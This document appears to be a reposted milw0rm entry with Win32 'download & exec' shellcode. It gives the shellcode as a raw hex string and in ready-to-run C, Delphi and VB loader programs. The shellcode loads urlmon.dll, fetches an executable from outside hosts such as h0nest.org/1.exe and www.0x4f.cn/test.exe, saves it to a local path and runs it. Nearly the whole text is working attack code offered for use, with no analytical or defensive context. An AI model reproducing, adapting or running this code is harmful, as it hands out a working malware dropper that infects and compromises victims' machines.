milw0rm 上的 win32 download & exec shellcode:
EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865
VC+:
/*
\ ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode ::
\ :: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:> ::
\ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::
\
*/
#include <stdio.h>
#include <string.h>
unsigned char sh4llcode[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"
"http://h0nest.org/1.exe";
int main()
{
void (*c0de)();
printf("Win32 \"download & exec shellcode\"\n");
*(int*)&c0de = sh4llcode;
c0de();
}
// milw0rm.com [2005-12-23]
DELPHI:
program download;
const
ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe
var
ShellCodeProc: procedure;
begin
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.
VB:
Attribute VB_Name = "Module1"
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Sub Main()
Dim ShellCode
Dim download() As Byte
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)
ReDim download(UBound(ShellCode))
For i = 0 To UBound(ShellCode)
download(i) = ShellCode(i)
Next
CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&
End Sub |